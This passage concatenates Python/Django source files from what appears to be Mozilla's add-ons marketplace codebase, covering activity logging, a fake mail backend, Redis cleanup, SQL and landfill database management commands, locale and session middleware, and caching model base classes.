LOG_KEEP = [l.id for l in LOGS if hasattr(l, 'keep')]
LOG_EDITORS = [l.id for l in LOGS if hasattr(l, 'editor_event')]
LOG_REVIEW_QUEUE = [l.id for l in LOGS if hasattr(l, 'review_queue')]
# Is the user emailed the message?
LOG_REVIEW_EMAIL_USER = [l.id for l in LOGS if hasattr(l, 'review_email_user')]
# Logs *not* to show to the developer.
LOG_HIDE_DEVELOPER = [l.id for l in LOGS
                      if (getattr(l, 'hide_developer', False)
                          or l.id in LOG_ADMINS)]
def log(action, *args, **kw):
    """Create an ActivityLog row for `action` and index it per argument.

    e.g. amo.log(amo.LOG.CREATE_ADDON, []),
         amo.log(amo.LOG.ADD_FILE_TO_VERSION, file, version)

    Positional args may be model instances or (ModelClass, pk) tuples;
    each recognized one also gets a companion *Log row so the activity can
    be looked up by app/version/user/group.  Recognized keyword args:
    user, details, created, attachments.  Returns the saved ActivityLog,
    or None when no user is available.
    """
    # Imports are local to avoid circular imports at module load time.
    from access.models import Group
    from addons.models import Addon
    from amo import get_user, logger_log
    from devhub.models import (ActivityLog, ActivityLogAttachment, AppLog,
                               CommentLog, GroupLog, UserLog, VersionLog)
    from mkt.webapps.models import Webapp
    from users.models import UserProfile
    from versions.models import Version
    user = kw.get('user', get_user())

    if not user:
        logger_log.warning('Activity log called with no user: %s' % action.id)
        return

    al = ActivityLog(user=user, action=action.id)
    al.arguments = args
    if 'details' in kw:
        al.details = kw['details']
    al.save()

    # Free-form reviewer comments get their own row for querying.
    if 'details' in kw and 'comments' in al.details:
        CommentLog(comments=al.details['comments'], activity_log=al).save()

    # TODO(davedash): post-remora this may not be necessary.
    if 'created' in kw:
        al.created = kw['created']
        # Double save necessary since django resets the created date on save.
        al.save()

    if 'attachments' in kw:
        formset = kw['attachments']
        storage = get_storage_class()()
        for form in formset:
            data = form.cleaned_data
            if 'attachment' in data:
                attachment = data['attachment']
                storage.save('%s/%s' % (settings.REVIEWER_ATTACHMENTS_PATH,
                                        attachment.name), attachment)
                ActivityLogAttachment(activity_log=al,
                                      description=data['description'],
                                      mimetype=attachment.content_type,
                                      filepath=attachment.name).save()

    for arg in args:
        # (ModelClass, pk) tuples let callers log against deleted or
        # not-yet-loaded objects by id.
        if isinstance(arg, tuple):
            if arg[0] == Webapp:
                AppLog(addon_id=arg[1], activity_log=al).save()
            elif arg[0] == Version:
                VersionLog(version_id=arg[1], activity_log=al).save()
            elif arg[0] == UserProfile:
                UserLog(user_id=arg[1], activity_log=al).save()
            elif arg[0] == Group:
                GroupLog(group_id=arg[1], activity_log=al).save()

        # Webapp first since Webapp subclasses Addon.
        if isinstance(arg, Webapp):
            AppLog(addon=arg, activity_log=al).save()
        elif isinstance(arg, Version):
            VersionLog(version=arg, activity_log=al).save()
        elif isinstance(arg, UserProfile):
            # Index by any user who is mentioned as an argument.
            UserLog(activity_log=al, user=arg).save()
        elif isinstance(arg, Group):
            GroupLog(group=arg, activity_log=al).save()

    # Index by every user
    UserLog(activity_log=al, user=user).save()
    return al
########NEW FILE########
__FILENAME__ = mail
import logging
from django.core.mail.backends.base import BaseEmailBackend
from amo.models import FakeEmail
log = logging.getLogger('z.amo.mail')
class FakeEmailBackend(BaseEmailBackend):
    """
    Used for development environments when we don't want to send out
    real emails. This gets swapped in as the email backend when
    `settings.SEND_REAL_EMAIL` is disabled.
    """

    def send_messages(self, messages):
        """Persist each message as a `FakeEmail` row instead of sending."""
        log.debug('Sending fake mail.')
        for message in messages:
            serialized = message.message().as_string()
            FakeEmail.objects.create(message=serialized)
        return len(messages)

    def view_all(self):
        """Useful for displaying messages in admin panel."""
        stored = FakeEmail.objects.values_list('message', flat=True)
        return stored.order_by('-created')

    def clear(self):
        """Delete every stored fake email."""
        return FakeEmail.objects.all().delete()
########NEW FILE########
__FILENAME__ = clean_redis
import logging
import os
import socket
import subprocess
import sys
import tempfile
import time
from django.core.management.base import BaseCommand
import redisutils
import redis as redislib
log = logging.getLogger('z.redis')
# We process the keys in chunks of size CHUNK.
CHUNK = 3000
# Remove any sets with less than MIN or more than MAX elements.
MIN = 10
MAX = 50
# Expire keys after EXPIRE seconds.
EXPIRE = 60 * 5
# Calling redis can raise raise these errors.
RedisError = redislib.RedisError, socket.error
def vacuum(master, slave):
    """Dump all slave keys to a temp file, then re-exec into cleanup().

    Writing the keys out and re-exec'ing (see the comment below) lets the
    OS reclaim the memory held by slave.keys().
    """
    def keys():
        """Yield the slave's keys in lists of at most CHUNK."""
        ks = slave.keys()
        log.info('There are %s keys to clean up.' % len(ks))
        ks = iter(ks)
        while 1:
            buffer = []
            for _ in xrange(CHUNK):
                try:
                    buffer.append(ks.next())
                except StopIteration:
                    yield buffer
                    return
            yield buffer

    tmp = tempfile.NamedTemporaryFile(delete=False)
    for ks in keys():
        # Bug fix: each chunk must end with a newline.  Previously chunks
        # were written with '\n'.join(ks) and no separator between writes,
        # so the last key of one chunk and the first key of the next were
        # fused into a single bogus line that cleanup() then operated on.
        if ks:
            tmp.write('\n'.join(ks) + '\n')
    tmp.close()
    # It's hard to get Python to clean up the memory from slave.keys(), so
    # we'll let the OS do it. You have to pass sys.executable both as the
    # thing to run and so argv[0] is set properly.
    os.execl(sys.executable, sys.executable, sys.argv[0],
             sys.argv[1], tmp.name)
def cleanup(master, slave, filename):
    """Expire small/huge sets listed (one key per line) in `filename`.

    Sizes are read from the slave in pipelined chunks; keys whose set size
    is in (0, MIN) or above MAX are expired on the master after EXPIRE
    seconds.  Redis errors skip the chunk rather than aborting.
    """
    tmp = open(filename)
    total = [1, 0]  # [total keys, total dropped] - list so closures can write.
    # Count lines with wc rather than reading the whole file into Python.
    p = subprocess.Popen(['wc', '-l', filename], stdout=subprocess.PIPE)
    total[0] = int(p.communicate()[0].strip().split()[0])

    def file_keys():
        """Yield stripped key lines from the file in lists of CHUNK."""
        while 1:
            buffer = []
            for _ in xrange(CHUNK):
                line = tmp.readline()
                if line:
                    buffer.append(line.strip())
                else:
                    yield buffer
                    return
            yield buffer

    num = 0
    for ks in file_keys():
        # One round-trip per chunk: pipeline all the SCARD calls.
        pipe = slave.pipeline()
        for k in ks:
            pipe.scard(k)
        try:
            drop = [k for k, size in zip(ks, pipe.execute())
                    if 0 < size < MIN or size > MAX]
        except RedisError:
            continue
        num += len(ks)
        percent = round(float(num) / total[0] * 100, 1) if total[0] else 0
        total[1] += len(drop)
        log.debug('[%s %.1f%%] Dropping %s keys.' % (num, percent, len(drop)))
        # Expire (rather than delete) the offenders on the master.
        pipe = master.pipeline()
        for k in drop:
            pipe.expire(k, EXPIRE)
        try:
            pipe.execute()
        except RedisError:
            continue
        time.sleep(1)  # Poor man's rate limiting.

    if total[0]:
        log.info('Dropped %s keys [%.1f%%].' %
                 (total[1], round(float(total[1]) / total[0] * 100, 1)))
class Command(BaseCommand):
    help = "Clean up the redis used by cache machine."

    def handle(self, *args, **kw):
        # Two-phase command: with no args, vacuum() dumps the keys to a temp
        # file and re-execs this command with the filename as an argument;
        # that second run takes the cleanup() branch below.
        try:
            master = redisutils.connections['cache']
            slave = redisutils.connections['cache_slave']
        except Exception:
            log.error('Could not connect to redis.', exc_info=True)
            return
        if args:
            filename = args[0]
            try:
                cleanup(master, slave, filename)
            finally:
                # Always remove the temp key dump, even on failure.
                os.unlink(filename)
        else:
            vacuum(master, slave)
########NEW FILE########
__FILENAME__ = extract_loc
import os
import re
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core.management.base import BaseCommand
from amo.storage_utils import walk_storage
_loc_re = re.compile(r"""\\?(loc)\(.*?\)""", (re.M | re.S))
_exts = ('.py', '.html')
_root = settings.ROOT
_subs = tuple([os.path.join(_root, s) for s in ['mkt']])
class Command(BaseCommand):
    """
    A very simple parser to find string marked with loc in py and html.

    This is rather naive, so don't worry about it being perfect, it's just
    so that we can find all the strings for the marketplace and pass them on
    to UX people. Or you could do a fancy grep.
    """

    def handle(self, *args, **options):
        count = 0
        for root, folders, files in walk_storage(_root):
            # Only look inside the mkt subtrees (_subs).
            if not root.startswith(_subs):
                continue
            for fname in files:
                fname = os.path.join(root, fname)
                if fname.endswith(_exts):
                    data = storage.open(fname).read()
                    found = False
                    for match in _loc_re.finditer(data):
                        if not found:
                            # Print the filename header once per file.
                            found = True
                            print fname
                            print '-' * len(fname)
                        print match.string[match.start():match.end()]
                        count += 1
                    if found:
                        print
        print 'Strings found:', count
########NEW FILE########
__FILENAME__ = fix_charfields
import itertools
from django.core.management.base import BaseCommand
from django.db import models, connection
qn = connection.ops.quote_name
def fix(table_name, field):
    """Return (UPDATE, ALTER-fragment) SQL making `field` non-null."""
    column = qn(field.column)
    update = ("UPDATE {table} SET {field}='' WHERE {field} IS NULL"
              .format(table=table_name, field=column))
    alter = "MODIFY {sql}".format(sql=sql(field))
    return update, alter
def sql(field):
    """Build the column-definition fragment: name, type, constraints."""
    parts = ['%s' % qn(field.column), field.db_type()]
    if not field.null:
        parts.append('NOT NULL')
    if field.primary_key:
        parts.append('PRIMARY KEY')
    has_default = field.default is not models.fields.NOT_PROVIDED
    if has_default:
        parts.append('default %r' % field.default)
    return ' '.join(parts)
class Command(BaseCommand):
    help = 'Print SQL to change CharFields to be non-null.'
    args = '[appname ...]'

    def handle(self, *app_labels, **options):
        # Restrict to the given apps, or scan every installed model.
        if app_labels:
            modules = [models.loading.get_app(app) for app in app_labels]
            models_ = itertools.chain(*[models.loading.get_models(mod)
                                        for mod in modules])
        else:
            models_ = models.loading.get_models()
        updates, alters = [], []
        for model in models_:
            model_alters = []
            table = model._meta.db_table
            for field in model._meta.fields:
                # Only non-null CharFields need the '' backfill + MODIFY.
                if isinstance(field, models.CharField) and not field.null:
                    update, alter = fix(table, field)
                    updates.append(update)
                    model_alters.append(alter)
            if model_alters:
                # One ALTER TABLE per model, with all its MODIFY clauses.
                alters.append('ALTER TABLE %s\n\t%s' %
                              (table, ',\n\t'.join(model_alters)))
        # UPDATEs first so no NULLs remain when the columns become NOT NULL.
        print ';\n'.join(updates + alters) + ';'
########NEW FILE########
__FILENAME__ = install_landfill
from datetime import date
from gzip import GzipFile
from optparse import make_option
import os
import shlex
from StringIO import StringIO
from subprocess import Popen, PIPE
import requests
from django.conf import settings
from django.core.management.base import BaseCommand
from zadmin.models import Config
class Command(BaseCommand):
    help = """
    Install a new landfill database. Requires that the database already exists.
    Landfill destroys and remakes each table before putting data into it. This
    is important to note as you'll have to rerun any migrations and you'll lose
    any custom data you've loaded.

    Requires that you have gzcat installed (default on most *nix).
    """
    option_list = BaseCommand.option_list + (
        make_option('--no-notice',
                    action='store_true',
                    dest='no_notice',
                    default=False,
                    help='Remove landfill site notice'),
        make_option('--no-download',
                    action='store_true',
                    dest='no_download',
                    default=False,
                    help='Use already downloaded landfill file.'),
        make_option('--no-save-file',
                    action='store_true',
                    dest='no_save_file',
                    default=False,
                    help='Do not save the file downloaded from allizom.'),
    )

    def handle(self, *args, **kw):
        # The dump is published per-day; build today's name and URL.
        filename = date.today().strftime('landfill-%Y-%m-%d.sql.gz')
        file_location = '/tmp/%s' % filename
        file_url = 'https://landfill.addons.allizom.org/db_data/%s' % filename
        write_dump = 'mysql -u%(db_user)s %(db_name)s' % {
            'db_user': settings.DATABASES['default']['USER'],
            'db_name': settings.DATABASES['default']['NAME'],
        }
        db_password = settings.DATABASES['default'].get('PASSWORD')
        if db_password:
            write_dump += ' -p%s' % db_password

        if kw['no_download']:
            # Reuse a previously downloaded dump from /tmp, if present.
            if os.path.exists(file_location):
                print('Skipping landfill download and using %s' % file_location)
                landfill_file = GzipFile(filename=file_location,
                                         mode='rb').read()
            else:
                print('No file for the current day')
                print('expected: %s' % file_location)
                return
        else:
            print('Downloading landfill file: %s' % file_url)
            # NOTE(review): verify=False skips TLS certificate validation.
            gzipped_file = requests.get(file_url, verify=False).content
            landfill_file = GzipFile(
                fileobj=StringIO(gzipped_file),
                mode='rb').read()
            if not kw['no_save_file']:
                if os.path.exists(file_location):
                    print('File already exists not overwriting: %s' % file_location)
                else:
                    with open(file_location, 'wb') as f:
                        print('Saving file to %s' % file_location)
                        f.write(gzipped_file)

        # Stream the decompressed SQL straight into the mysql client.
        print('Piping file into mysql.')
        writer_process = Popen(
            shlex.split(write_dump),
            stdin=PIPE)
        writer_process.communicate(input=landfill_file)
        writer_process.wait()

        if kw['no_notice']:
            print('Removing landfile site notice.')
            Config.objects.filter(key='site_notice').delete()
########NEW FILE########
__FILENAME__ = messages
from functools import partial
from django.contrib import messages as django_messages
import jinja2
from jingo import env
"""
This file was created because AMO wants to have multi-line messages including a
title and some content. Django's messages framework only takes a single string.
Importing this file should behave exactly like Django's messages framework
except it will take a 3rd argument as message content (the second is the message
title).
"""
def _make_message(title=None, message=None, title_safe=False,
                  message_safe=False):
    """Render the title/message pair through the shared message template."""
    context = {
        'title': title,
        'message': message,
        'title_safe': title_safe,
        'message_safe': message_safe,
    }
    rendered = env.get_template('message_content.html').render(context)
    return jinja2.Markup(rendered)
def _is_dupe(msg, request):
    """Returns whether a particular message is already cued for display."""
    storage = django_messages.get_messages(request)
    # If there are no messages stored, Django doesn't give us a proper storage
    # object, so just bail early.
    if not storage:
        return False
    try:
        smsg = unicode(msg)
        is_dupe = False
        for message in storage:
            if unicode(message) == smsg:
                # We can't return from here because we need to tell Django not
                # to consume the messages.
                is_dupe = True
                break
    except (UnicodeDecodeError, UnicodeEncodeError):
        return False
    finally:
        # Bug fix: this must run even when a unicode error aborts the scan.
        # Previously the early return skipped it, leaving the storage marked
        # as used, so Django would consume (discard) the queued messages.
        storage.used = False
    return is_dupe
def _file_message(type_, request, title, message=None, extra_tags='',
                  fail_silently=False, title_safe=False, message_safe=False):
    """Build the combined title/message and queue it via Django messages."""
    msg = _make_message(title, message, title_safe, message_safe)
    if _is_dupe(msg, request):
        # Don't save duplicates.
        return
    queue = getattr(django_messages, type_)
    queue(request, msg, extra_tags, fail_silently)
# Public API: mirrors django.contrib.messages but takes a title as the
# second argument and an optional body as the third (see module docstring).
debug = partial(_file_message, 'debug')
info = partial(_file_message, 'info')
success = partial(_file_message, 'success')
warning = partial(_file_message, 'warning')
error = partial(_file_message, 'error')
########NEW FILE########
__FILENAME__ = middleware
"""
Borrowed from: http://code.google.com/p/django-localeurl
Note: didn't make sense to use localeurl since we need to capture app as well
"""
import contextlib
import urllib
from django.conf import settings
from django.contrib.sessions.middleware import SessionMiddleware
from django.core.urlresolvers import is_valid_path
from django.http import (Http404, HttpResponseRedirect,
HttpResponsePermanentRedirect)
from django.middleware import common
from django.shortcuts import render
from django.utils.cache import patch_vary_headers, patch_cache_control
from django.utils.encoding import iri_to_uri, smart_str
import MySQLdb as mysql
import tower
import amo
from . import urlresolvers
from .helpers import urlparams
class LocaleAndAppURLMiddleware(object):
    """
    1. search for locale first
    2. see if there are acceptable apps
    3. save those matched parameters in the request
    4. strip them from the URL so we can do stuff
    """

    def process_request(self, request):
        # Find locale, app
        prefixer = urlresolvers.Prefixer(request)
        # Permanent redirects in production; temporary in DEBUG so local
        # changes aren't cached by the browser.
        if settings.DEBUG:
            redirect_type = HttpResponseRedirect
        else:
            redirect_type = HttpResponsePermanentRedirect
        urlresolvers.set_url_prefix(prefixer)
        full_path = prefixer.fix(prefixer.shortened_path)

        # In mkt, don't vary headers on User-Agent.
        with_app = False

        if (prefixer.app == amo.MOBILE.short and
            request.path.rstrip('/').endswith('/' + amo.MOBILE.short)):
            # TODO: Eventually put MOBILE in RETIRED_APPS, but not yet.
            return redirect_type(request.path.replace('/mobile', '/android'))

        if 'lang' in request.GET:
            # Blank out the locale so that we can set a new one. Remove lang
            # from query params so we don't have an infinite loop.
            prefixer.locale = ''
            new_path = prefixer.fix(prefixer.shortened_path)
            query = dict((smart_str(k), request.GET[k]) for k in request.GET)
            query.pop('lang')
            return redirect_type(urlparams(new_path, **query))

        if full_path != request.path:
            # The URL was missing (or had a different) locale/app prefix;
            # redirect to the canonical form, preserving the query string.
            query_string = request.META.get('QUERY_STRING', '')
            full_path = urllib.quote(full_path.encode('utf-8'))

            if query_string:
                full_path = "%s?%s" % (full_path, query_string)

            response = redirect_type(full_path)
            # Cache the redirect for a year.
            if not settings.DEBUG:
                patch_cache_control(response, max_age=60 * 60 * 24 * 365)

            # Vary on Accept-Language or User-Agent if we changed the locale or
            # app.
            old_app = prefixer.app
            old_locale = prefixer.locale
            new_locale, new_app, _ = prefixer.split_path(full_path)

            if old_locale != new_locale:
                patch_vary_headers(response, ['Accept-Language'])
            if with_app and old_app != new_app:
                patch_vary_headers(response, ['User-Agent'])
            return response

        # No redirect needed: strip the prefix for the resolver and stash
        # the matched locale/app on the request.
        request.path_info = '/' + prefixer.shortened_path
        tower.activate(prefixer.locale)
        request.APP = amo.APPS.get(prefixer.app, amo.FIREFOX)
        request.LANG = prefixer.locale
class NoVarySessionMiddleware(SessionMiddleware):
    """
    SessionMiddleware sets Vary: Cookie anytime request.session is accessed.
    request.session is accessed indirectly anytime request.user is touched.
    We always touch request.user to see if the user is authenticated, so every
    request would be sending vary, so we'd get no caching.

    We skip the cache in Zeus if someone has an AMOv3 cookie, so varying on
    Cookie at this level only hurts us.
    """

    def process_request(self, request):
        # API requests skip session handling entirely.
        if not getattr(request, 'API', False):
            super(NoVarySessionMiddleware, self).process_request(request)

    def process_response(self, request, response):
        if settings.READ_ONLY:
            return response
        # Let SessionMiddleware do its processing but prevent it from changing
        # the Vary header.
        vary = None
        if hasattr(response, 'get'):
            vary = response.get('Vary', None)
        new_response = (super(NoVarySessionMiddleware, self)
                        .process_response(request, response))
        if vary:
            # Restore whatever Vary value we had before SessionMiddleware ran.
            new_response['Vary'] = vary
        else:
            del new_response['Vary']
        return new_response
class RemoveSlashMiddleware(object):
    """
    Middleware that tries to remove a trailing slash if there was a 404.

    If the response is a 404 because url resolution failed, we'll look for a
    better url without a trailing slash.
    """

    def process_response(self, request, response):
        path = request.path_info
        should_redirect = (response.status_code == 404 and
                           path.endswith('/') and
                           not is_valid_path(path) and
                           is_valid_path(path[:-1]))
        if not should_redirect:
            return response
        # Use request.path because we munged app/locale in path_info.
        newurl = request.path[:-1]
        if request.GET:
            with safe_query_string(request):
                newurl += '?' + request.META.get('QUERY_STRING', '')
        return HttpResponsePermanentRedirect(newurl)
@contextlib.contextmanager
def safe_query_string(request):
    """
    Turn the QUERY_STRING into a unicode- and ascii-safe string.

    We need unicode so it can be combined with a reversed URL, but it has to be
    ascii to go in a Location header.  iri_to_uri seems like a good compromise.
    """
    qs = request.META.get('QUERY_STRING', '')
    try:
        request.META['QUERY_STRING'] = iri_to_uri(qs)
        yield
    finally:
        # Always restore the raw query string for downstream consumers.
        request.META['QUERY_STRING'] = qs
class CommonMiddleware(common.CommonMiddleware):
    # Same as Django's CommonMiddleware, but runs with an ascii-safe
    # QUERY_STRING so any redirect URL it builds is safe for a Location
    # header (see safe_query_string above).
    def process_request(self, request):
        with safe_query_string(request):
            return super(CommonMiddleware, self).process_request(request)
class ReadOnlyMiddleware(object):
    # Read-only mode: refuse writes up front and turn database errors into
    # a friendly 503 page.

    def process_request(self, request):
        # POSTs imply a write; reject them while read-only.
        if request.method == 'POST':
            return render(request, 'amo/read-only.html', status=503)

    def process_exception(self, request, exception):
        # A MySQL OperationalError is assumed to be the read-only database
        # refusing a write.
        if isinstance(exception, mysql.OperationalError):
            return render(request, 'amo/read-only.html', status=503)
class ViewMiddleware(object):

    def get_name(self, view_func):
        """Return 'module.name' for a function- or class-based view."""
        if hasattr(view_func, '__name__'):
            name = view_func.__name__
        else:
            # Class-based views are instances, not functions; fall back to
            # the class name.
            name = view_func.__class__.__name__
        return '%s.%s' % (view_func.__module__, name)
class NoAddonsMiddleware(ViewMiddleware):
    """
    If enabled will try and stop any requests to addons by 404'ing them.
    Here there be dragons. Fortunately this is temporary right?
    """

    def process_view(self, request, view_func, view_args, view_kwargs):
        # 404 any view whose dotted path starts with a blocked module prefix.
        name = self.get_name(view_func)
        if name.startswith(settings.NO_ADDONS_MODULES):
            raise Http404
########NEW FILE########
__FILENAME__ = models
import contextlib
import threading
from django.conf import settings
from django.db import models, transaction
from django.utils import encoding, translation
import caching.base
import multidb.pinning
import queryset_transform
from . import signals # Needed to set up url prefix signals.
_locals = threading.local()
_locals.skip_cache = False
@contextlib.contextmanager
def use_master():
    """Route every query made inside this context to the master DB."""
    pinning = multidb.pinning
    # Remember the previous pin state so nested use restores correctly.
    previously_pinned = getattr(pinning._locals, 'pinned', False)
    pinning.pin_this_thread()
    try:
        yield
    finally:
        pinning._locals.pinned = previously_pinned
@contextlib.contextmanager
def skip_cache():
    """Bypass the query cache for everything inside this context."""
    previous = getattr(_locals, 'skip_cache', False)
    _locals.skip_cache = True
    try:
        yield
    finally:
        _locals.skip_cache = previous
# This is sadly a copy and paste of annotate to get around this
# ticket http://code.djangoproject.com/ticket/14707
def annotate(self, *args, **kwargs):
    """Copy of Django's QuerySet.annotate() (see the ticket above).

    Monkeypatched over the stock implementation below; apart from the
    ticket workaround it must behave exactly like Django's version.
    """
    for arg in args:
        if arg.default_alias in kwargs:
            raise ValueError("The %s named annotation conflicts with the "
                             "default name for another annotation."
                             % arg.default_alias)
        kwargs[arg.default_alias] = arg
    obj = self._clone()
    obj._setup_aggregate_query(kwargs.keys())
    # Add the aggregates to the query
    for (alias, aggregate_expr) in kwargs.items():
        obj.query.add_aggregate(aggregate_expr, self.model, alias,
                                is_summary=False)
    return obj
# Replace the stock implementation for every QuerySet in this process.
models.query.QuerySet.annotate = annotate
class TransformQuerySet(queryset_transform.TransformQuerySet):
    """Queryset that can detach and re-attach its transform functions."""

    def pop_transforms(self):
        """Return (transform_fns, clone-without-transforms)."""
        clone = self._clone()
        pending = clone._transform_fns
        clone._transform_fns = []
        return pending, clone

    def no_transforms(self):
        """Return a clone with every transform removed."""
        _, clone = self.pop_transforms()
        return clone

    def only_translations(self):
        """Drop all transforms except the translation attacher."""
        from translations import transformer
        # The extra select gives these rows a distinct cache key.
        bare = self.no_transforms().extra(select={'_only_trans': 1})
        return bare.transform(transformer.get_trans)

    def transform(self, fn):
        from . import decorators
        # Transforms mutate fresh objects, so never serve them from cache.
        return super(TransformQuerySet, self).transform(
            decorators.skip_cache(fn))
class RawQuerySet(models.query.RawQuerySet):
    """A RawQuerySet with __len__.

    Results are fetched once and memoized in ``_result_cache`` so repeated
    iteration or len() does not re-run the raw SQL.
    """

    def __init__(self, *args, **kw):
        super(RawQuerySet, self).__init__(*args, **kw)
        self._result_cache = None

    def __iter__(self):
        if self._result_cache is None:
            self._result_cache = list(super(RawQuerySet, self).__iter__())
        return iter(self._result_cache)

    def __len__(self):
        # Populate the cache (no-op if already filled), then measure it
        # directly instead of copying the results into a throwaway list.
        self.__iter__()
        return len(self._result_cache)
# MRO puts our RawQuerySet first, so raw results get __len__/memoization
# plus cache-machine's caching behavior.
class CachingRawQuerySet(RawQuerySet, caching.base.CachingRawQuerySet):
    """A RawQuerySet with __len__ and caching."""
# Make TransformQuerySet one of CachingQuerySet's parents so that we can do
# transforms on objects and then get them cached.
# NOTE: mutating __bases__ affects every user of caching.base.CachingQuerySet
# in this process, not just this module.
CachingQuerySet = caching.base.CachingQuerySet
CachingQuerySet.__bases__ = (TransformQuerySet,) + CachingQuerySet.__bases__
class UncachedManagerBase(models.Manager):
    """Manager that applies translation transforms but skips the cache."""

    def get_query_set(self):
        qs = self._with_translations(TransformQuerySet(self.model))
        return qs

    def _with_translations(self, qs):
        from translations import transformer
        # Since we're attaching translations to the object, we need to stick
        # the locale in the query so objects aren't shared across locales.
        if hasattr(self.model._meta, 'translated_fields'):
            lang = translation.get_language()
            qs = qs.transform(transformer.get_trans)
            # Always-true WHERE clause whose only purpose is to get the
            # locale into the SQL text (and therefore the cache key).
            qs = qs.extra(where=['"%s"="%s"' % (lang, lang)])
        return qs

    def transform(self, fn):
        return self.all().transform(fn)

    def raw(self, raw_query, params=None, *args, **kwargs):
        # Use our RawQuerySet so raw results support len() and memoization.
        return RawQuerySet(raw_query, self.model, params=params,
                           using=self._db, *args, **kwargs)

    def safer_get_or_create(self, defaults=None, **kw):
        """
        This is subjective, but I don't trust get_or_create until #13906
        gets fixed. It's probably fine, but this makes me happy for the moment
        and solved a get_or_create we've had in the past.
        """
        with transaction.commit_on_success():
            try:
                return self.get(**kw), False
            except self.model.DoesNotExist:
                if defaults is not None:
                    kw.update(defaults)
                return self.create(**kw), True
class ManagerBase(caching.base.CachingManager, UncachedManagerBase):
    """
    Base for all managers in AMO.
    Returns TransformQuerySets from the queryset_transform project.
    If a model has translated fields, they'll be attached through a transform
    function.
    """
    def get_queryset(self):
        qs = super(ManagerBase, self).get_queryset()
        # Honor the skip_cache() context manager for this thread.
        if getattr(_locals, 'skip_cache', False):
            qs = qs.no_cache()
        return self._with_translations(qs)

    def raw(self, raw_query, params=None, *args, **kwargs):
        # Cached counterpart of UncachedManagerBase.raw().
        return CachingRawQuerySet(raw_query, self.model, params=params,
                                  using=self._db, *args, **kwargs)
class _NoChangeInstance(object):
    """A proxy for object instances to make safe operations within an
    OnChangeMixin.on_change() callback.

    save()/update() through the proxy force _signal=False, so a callback
    cannot recursively re-trigger the change handlers.
    """

    def __init__(self, instance):
        self.__instance = instance

    def __repr__(self):
        return u'<%s for %r>' % (self.__class__.__name__, self.__instance)

    def __getattr__(self, attr):
        return getattr(self.__instance, attr)

    def __setattr__(self, attr, val):
        # Name mangling turns self.__instance into the key below; that one
        # attribute belongs to the proxy itself, everything else is
        # forwarded to the wrapped instance.
        if attr.endswith('__instance'):
            # _NoChangeInstance__instance
            self.__dict__[attr] = val
        else:
            setattr(self.__instance, attr, val)

    def save(self, *args, **kw):
        kw['_signal'] = False
        return self.__instance.save(*args, **kw)

    def update(self, *args, **kw):
        kw['_signal'] = False
        return self.__instance.update(*args, **kw)
# Registry mapping model class -> list of on_change callbacks; populated
# via OnChangeMixin.on_change().
_on_change_callbacks = {}
# @TODO(Kumar) liberate: move OnChangeMixin Model mixin to nuggets
class OnChangeMixin(object):
    """Mixin for a Model that allows you to observe attribute changes.
    Register change observers with::
        class YourModel(amo.models.OnChangeMixin,
                        amo.models.ModelBase):
            # ...
            pass
        YourModel.on_change(callback)
    """
    def __init__(self, *args, **kw):
        super(OnChangeMixin, self).__init__(*args, **kw)
        # Snapshot of attributes right after load/creation; used as the
        # "old" side when diffing in save().
        self._initial_attr = dict(self.__dict__)

    @classmethod
    def on_change(cls, callback):
        """Register a function to call on save or update to respond to changes.
        For example::
            def watch_status(old_attr={}, new_attr={},
                             instance=None, sender=None, **kw):
                if old_attr.get('status') != new_attr.get('status'):
                    # ...
                    new_instance.save(_signal=False)
            TheModel.on_change(watch_status)
        .. note::
            Any call to instance.save() or instance.update() within a callback
            will not trigger any change handlers.
        .. note::
            Duplicates based on function.__name__ are ignored for a given
            class.
        """
        existing = _on_change_callbacks.get(cls, [])
        # Same-named callback already registered for this class: no-op.
        if callback.__name__ in [e.__name__ for e in existing]:
            return callback
        _on_change_callbacks.setdefault(cls, []).append(callback)
        return callback

    def _send_changes(self, old_attr, new_attr_kw):
        # Build the "new" attribute dict and fan out to every callback,
        # handing each a _NoChangeInstance so callbacks can't recurse.
        new_attr = old_attr.copy()
        new_attr.update(new_attr_kw)
        for cb in _on_change_callbacks[self.__class__]:
            cb(old_attr=old_attr, new_attr=new_attr,
               instance=_NoChangeInstance(self), sender=self.__class__)

    def save(self, *args, **kw):
        """
        Save changes to the model instance.
        If _signal=False is in `kw` the on_change() callbacks won't be called.
        """
        signal = kw.pop('_signal', True)
        result = super(OnChangeMixin, self).save(*args, **kw)
        if signal and self.__class__ in _on_change_callbacks:
            self._send_changes(self._initial_attr, dict(self.__dict__))
        return result

    def update(self, **kw):
        """
        Shortcut for doing an UPDATE on this object.
        If _signal=False is in ``kw`` the post_save signal won't be sent.
        """
        signal = kw.pop('_signal', True)
        # Unlike save(), diff against the attributes as of this call, not
        # as of instance creation.
        old_attr = dict(self.__dict__)
        result = super(OnChangeMixin, self).update(_signal=signal, **kw)
        if signal and self.__class__ in _on_change_callbacks:
            self._send_changes(old_attr, kw)
        return result
class ModelBase(caching.base.CachingMixin, models.Model):
    """
    Base class for AMO models to abstract some common features.
    * Adds automatic created and modified fields to the model.
    * Fetches all translations in one subsequent query during initialization.
    """
    created = models.DateTimeField(auto_now_add=True)
    modified = models.DateTimeField(auto_now=True)
    objects = ManagerBase()

    class Meta:
        abstract = True
        get_latest_by = 'created'

    def get_absolute_url(self, *args, **kwargs):
        # Subclasses provide get_url_path(); this adapts it to the Django
        # convention.
        return self.get_url_path(*args, **kwargs)

    @classmethod
    def _cache_key(cls, pk, db):
        """
        Custom django-cache-machine cache key implementation that avoids having
        the real db in the key, since we are only using master-slaves we don't
        need it and it avoids invalidation bugs with FETCH_BY_ID.
        """
        key_parts = ('o', cls._meta, pk, 'default')
        return ':'.join(map(encoding.smart_unicode, key_parts))

    def reload(self):
        """Reloads the instance from the database."""
        from_db = self.__class__.objects.get(id=self.id)
        for field in self.__class__._meta.fields:
            try:
                setattr(self, field.name, getattr(from_db, field.name))
            except models.ObjectDoesNotExist:
                # reload() can be called before cleaning up an object of stale
                # related fields, when we do soft-deletion for instance. Avoid
                # failing because of that.
                pass
        return self

    def update(self, **kw):
        """
        Shortcut for doing an UPDATE on this object.
        If _signal=False is in ``kw`` the post_save signal won't be sent.
        """
        signal = kw.pop('_signal', True)
        cls = self.__class__
        for k, v in kw.items():
            setattr(self, k, v)
        if signal:
            # Detect any attribute changes during pre_save and add those to the
            # update kwargs.
            attrs = dict(self.__dict__)
            models.signals.pre_save.send(sender=cls, instance=self)
            for k, v in self.__dict__.items():
                if attrs[k] != v:
                    kw[k] = v
                    setattr(self, k, v)
